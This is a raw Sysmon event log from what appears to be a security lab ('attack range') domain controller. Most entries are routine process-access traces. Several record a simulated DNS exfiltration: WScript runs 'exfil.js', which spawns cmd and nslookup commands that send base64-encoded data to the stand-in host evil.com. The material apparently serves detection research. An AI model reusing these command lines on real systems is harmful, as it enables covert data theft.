14:16:18.353{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E13E-6299-1600-000000005F02}1328C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196881Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.353{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B2-629A-F03E-000000005F02}6092C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196880Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.337{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196879Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.337{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196878Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.337{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196877Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.337{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196876Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.337{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B2-629A-EF3E-000000005F02}7824C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196875Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.337{2E1864BB-17A1-629A-783D-000000005F02}5552908C:\Windows\System32\WScript.exe{2E1864BB-17B2-629A-EF3E-000000005F02}7824C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196874Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.348{2E1864BB-17B2-629A-EF3E-000000005F02}7824C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Kioqd2luMzJfY29tcHV0ZXJzeXN0ZW0qKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nllqhx.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000196873Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.337{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlkumd.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000196872Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.269{2E1864BB-17B2-629A-ED3E-000000005F02}61767436C:\Windows\system32\conhost.exe{2E1864BB-17B2-629A-EE3E-000000005F02}2672C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196871Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.253{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B2-629A-EE3E-000000005F02}2672C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196870Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.269{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196869Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.269{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196868Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.253{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196867Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.253{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196866Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.253{2E1864BB-17B2-629A-EC3E-000000005F02}66567036C:\Windows\system32\cmd.exe{2E1864BB-17B2-629A-EE3E-000000005F02}2672C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196865Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.267{2E1864BB-17B2-629A-EE3E-000000005F02}2672C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B2-629A-EC3E-000000005F02}6656C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkumd.tmp 2>&1 10341000x8000000000000000196864Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.237{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17B2-629A-ED3E-000000005F02}6176C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196863Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.237{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B2-629A-ED3E-000000005F02}6176C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196862Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.236{2E1864BB-17B2-629A-ED3E-000000005F02}61767436C:\Windows\system32\conhost.exe{2E1864BB-17B2-629A-EC3E-000000005F02}6656C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196861Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.216{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B2-629A-ED3E-000000005F02}6176C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196860Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.201{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196859Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.201{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196858Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.201{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196857Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.201{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17B2-629A-EC3E-000000005F02}6656C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000196856Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.201{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000196855Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.201{2E1864BB-17A1-629A-783D-000000005F02}55528048C:\Windows\System32\WScript.exe{2E1864BB-17B2-629A-EC3E-000000005F02}6656C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000196854Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:18.209{2E1864BB-17B2-629A-EC3E-000000005F02}6656C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkumd.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 354300x8000000000000000196853Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.629{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52377- 354300x8000000000000000196852Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.628{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52376- 354300x8000000000000000196851Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.627{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52375- 354300x8000000000000000196850Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.627{00000000-0000-0000-0000-000000000000}1636<unknown process>-udptruefalse127.0.0.1-52375-false127.0.0.1-53domain 354300x8000000000000000196849Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:16.481{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52374- 23542300x8000000000000000196848Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 